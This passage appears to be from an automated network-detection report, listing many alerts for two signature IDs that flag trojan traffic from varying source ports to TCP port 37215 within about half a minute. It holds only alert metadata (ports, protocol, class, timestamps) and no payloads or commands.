          SID:2835222
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029018
          SID:2829579
          Source Port:60514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984345
          SID:2835222
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.684777
          SID:2835222
          Source Port:37052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085446
          SID:2829579
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103028
          SID:2835222
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864419
          SID:2829579
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283674
          SID:2829579
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396211
          SID:2829579
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397828
          SID:2835222
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904289
          SID:2835222
          Source Port:33594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158352
          SID:2829579
          Source Port:34614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929123
          SID:2829579
          Source Port:48828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923560
          SID:2835222
          Source Port:39366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924565
          SID:2835222
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000850
          SID:2829579
          Source Port:34648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602566
          SID:2829579
          Source Port:55392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925481
          SID:2829579
          Source Port:58704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926963
          SID:2829579
          Source Port:44354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538203
          SID:2829579
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987222
          SID:2829579
          Source Port:54346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287525
          SID:2835222
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538506
          SID:2835222
          Source Port:45068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944830
          SID:2835222
          Source Port:58886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916314
          SID:2829579
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950191
          SID:2835222
          Source Port:43026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644667
          SID:2829579
          Source Port:49970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822643
          SID:2835222
          Source Port:33390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823236
          SID:2829579
          Source Port:59734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947615
          SID:2829579
          Source Port:37788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990137
          SID:2829579
          Source Port:51172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865268
          SID:2835222
          Source Port:41400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869813
          SID:2829579
          Source Port:53876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.952075
          SID:2829579
          Source Port:48514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000538
          SID:2829579
          Source Port:47934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285800
          SID:2829579
          Source Port:54430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465529
          SID:2829579
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559086
          SID:2829579
          Source Port:45468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643886
          SID:2835222
          Source Port:54622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101062
          SID:2835222
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032827
          SID:2829579
          Source Port:43904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475632
          SID:2835222
          Source Port:38346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225977
          SID:2829579
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539847
          SID:2829579
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030726
          SID:2835222
          Source Port:38686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396871
          SID:2829579
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078874
          SID:2835222
          Source Port:58338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916967
          SID:2835222
          Source Port:40008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.470977
          SID:2829579
          Source Port:44154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538617
          SID:2829579
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253035
          SID:2835222
          Source Port:59642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282193
          SID:2835222
          Source Port:35852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867299
          SID:2835222
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076954
          SID:2835222
          Source Port:53554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079835
          SID:2829579
          Source Port:45018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034988
          SID:2835222
          Source Port:50696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593784
          SID:2829579
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420077
          SID:2829579
          Source Port:58236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081140
          SID:2829579
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037688
          SID:2829579
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472163
          SID:2835222
          Source Port:36066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165984
          SID:2829579
          Source Port:55270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074547
          SID:2829579
          Source Port:50134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902044
          SID:2829579
          Source Port:37148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822771
          SID:2829579
          Source Port:39036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041380
          SID:2829579
          Source Port:54358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245546
          SID:2835222
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539060
          SID:2829579
          Source Port:53228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412932
          SID:2829579
          Source Port:34808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164201
          SID:2835222
          Source Port:59304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646189
          SID:2829579
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103266
          SID:2829579
          Source Port:57680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245470
          SID:2835222
          Source Port:57846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.096319
          SID:2835222
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862859
          SID:2829579
          Source Port:35192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540145
          SID:2829579
          Source Port:42512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946418
          SID:2835222
          Source Port:54556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646089
          SID:2835222
          Source Port:52016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539563
          SID:2835222
          Source Port:57180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223272
          SID:2829579
          Source Port:55726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928712
          SID:2835222
          Source Port:44230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035542
          SID:2835222
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633966
          SID:2829579
          Source Port:60246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230197
          SID:2835222
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357546
          SID:2829579
          Source Port:60926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286473
          SID:2829579
          Source Port:49810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.933708
          SID:2835222
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274664
          SID:2835222
          Source Port:38472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567634
          SID:2835222
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225768
          SID:2829579
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947123
          SID:2835222
          Source Port:33266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677183
          SID:2835222
          Source Port:60962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160163
          SID:2835222
          Source Port:52714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161261
          SID:2835222
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223044
          SID:2835222
          Source Port:32912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010497
          SID:2835222
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990884
          SID:2835222
          Source Port:46056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993573
          SID:2835222
          Source Port:50040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472453
          SID:2835222
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714912
          SID:2835222
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818799
          SID:2835222
          Source Port:57332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414351
          SID:2835222
          Source Port:33106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162830
          SID:2835222
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918993
          SID:2835222
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660851
          SID:2829579
          Source Port:53236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288456
          SID:2829579
          Source Port:37590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224719
          SID:2835222
          Source Port:34962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.127802
          SID:2829579
          Source Port:42806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205651
          SID:2835222
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283104
          SID:2835222
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253210
          SID:2835222
          Source Port:36180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302590
          SID:2829579
          Source Port:58992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038089
          SID:2835222
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017264
          SID:2829579
          Source Port:42382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472083
          SID:2835222
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272279
          SID:2829579
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552337
          SID:2829579
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645069
          SID:2835222
          Source Port:56704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602710
          SID:2835222
          Source Port:50316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104581
          SID:2835222
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008222
          SID:2835222
          Source Port:49380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635124
          SID:2829579
          Source Port:42648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557479
          SID:2829579
          Source Port:58728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563365
          SID:2829579
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163826
          SID:2829579
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168265
          SID:2835222
          Source Port:51102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945702
          SID:2835222
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162025
          SID:2829579
          Source Port:41492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206436
          SID:2835222
          Source Port:33386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246639
          SID:2835222
          Source Port:43472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249449
          SID:2829579
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163467
          SID:2835222
          Source Port:60686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076583
          SID:2829579
          Source Port:58272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478939
          SID:2829579
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993663
          SID:2829579
          Source Port:52196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644219
          SID:2835222
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.085292
          SID:2829579
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923593
          SID:2835222
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253187
          SID:2835222
          Source Port:47080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929571
          SID:2829579
          Source Port:54528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820563
          SID:2835222
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227748
          SID:2829579
          Source Port:37144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102662
          SID:2835222
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395912
          SID:2835222
          Source Port:60584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468066
          SID:2835222
          Source Port:47300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166586
          SID:2835222
          Source Port:38968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028927
          SID:2829579
          Source Port:60538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166033
          SID:2829579
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821906
          SID:2829579
          Source Port:34612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035103
          SID:2829579
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863802
          SID:2829579
          Source Port:56142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298003
          SID:2829579
          Source Port:44846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720994
          SID:2835222
          Source Port:43456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.858765
          SID:2835222
          Source Port:47290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891236
          SID:2829579
          Source Port:33674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929995
          SID:2835222
          Source Port:35192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400025
          SID:2829579
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719800
          SID:2829579
          Source Port:43392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928271
          SID:2829579
          Source Port:34094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075579
          SID:2829579
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245951
          SID:2835222
          Source Port:53656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477424
          SID:2835222
          Source Port:49786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294657
          SID:2829579
          Source Port:48706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079471
          SID:2835222
          Source Port:50650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598257
          SID:2829579
          Source Port:42154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914173
          SID:2829579
          Source Port:57572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720189
          SID:2829579
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030761
          SID:2835222
          Source Port:53406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102938
          SID:2829579
          Source Port:36690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289498
          SID:2829579
          Source Port:39678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916640
          SID:2835222
          Source Port:43788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165798
          SID:2835222
          Source Port:60934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928638
          SID:2829579
          Source Port:36094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716835
          SID:2835222
          Source Port:50810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132358
          SID:2829579
          Source Port:55672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651577
          SID:2829579
          Source Port:58804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.295624
          SID:2829579
          Source Port:51466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230454
          SID:2835222
          Source Port:46820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823603
          SID:2829579
          Source Port:44956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480770
          SID:2829579
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250611
          SID:2829579
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074607
          SID:2835222
          Source Port:44874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166721
          SID:2829579
          Source Port:54236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288219
          SID:2829579
          Source Port:44072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820560
          SID:2835222
          Source Port:39750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296228
          SID:2835222
          Source Port:45490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080569
          SID:2829579
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413138
          SID:2829579
          Source Port:48850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075273
          SID:2829579
          Source Port:45872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819308
          SID:2835222
          Source Port:56910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658815
          SID:2835222
          Source Port:60046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076396
          SID:2835222
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599578
          SID:2829579
          Source Port:42060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168122
          SID:2829579
          Source Port:45500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724145
          SID:2829579
          Source Port:40754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073949
          SID:2835222
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102990
          SID:2829579
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416245
          SID:2835222
          Source Port:52410
          Destination Port:37215
